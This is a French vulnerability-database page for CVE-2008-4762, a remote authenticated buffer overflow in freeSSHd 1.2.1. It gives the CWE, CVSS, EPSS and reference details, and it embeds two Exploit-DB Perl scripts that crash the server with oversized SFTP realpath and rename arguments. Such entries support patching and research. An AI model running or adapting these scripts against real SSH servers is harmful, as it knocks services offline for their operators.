CVE-2008-4762 : Détail

CVE-2008-4762

Overflow
5.84%V3
Network
2008-10-27
23h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9 AV:N/AC:L/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6812

Date de publication : 2008-10-21 22h00 +00:00
Auteur : Jeremy Brown
EDB Vérifié : Yes

#!/usr/bin/perl # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More. use Net::SSH2; $host = "192.168.0.100"; $port = 22; $username = "test"; $password = "test"; $dos = "A" x 262145; $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) || die "\nError: Connection Refused!\n"; $ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; $sftp = $ssh2->sftp(); $realpath = $sftp->realpath($dos); $ssh2->disconnect(); exit; # milw0rm.com [2008-10-22]
Exploit Database EDB-ID : 6800

Date de publication : 2008-10-21 22h00 +00:00
Auteur : Jeremy Brown
EDB Vérifié : Yes

#!/usr/bin/perl # Jeremy Brown [[email protected]/jbrownsec.blogspot.com] # FreeSSH 1.2.1 Crash -- A Product of Fuzzing. Stay Tuned. use Net::SSH2; $host = "192.168.0.187"; $port = 22; $username = "test"; $password = "test"; $dos = "A" x 550000; $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) || die "\nError: Connection Refused!\n"; $ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; $sftp = $ssh2->sftp(); $rename = $sftp->rename($dos, "test"); $ssh2->disconnect(); exit; # milw0rm.com [2008-10-22]

Products Mentioned

Configuraton 0

Freesshd>>Freesshd >> Version 1.2.1

Références

http://www.securitytracker.com/id?1021096
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/32366
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/31872
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/4515
Tags : third-party-advisory, x_refsource_SREASON
https://www.exploit-db.com/exploits/6812
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2008/2897
Tags : vdb-entry, x_refsource_VUPEN
https://www.exploit-db.com/exploits/6800
Tags : exploit, x_refsource_EXPLOIT-DB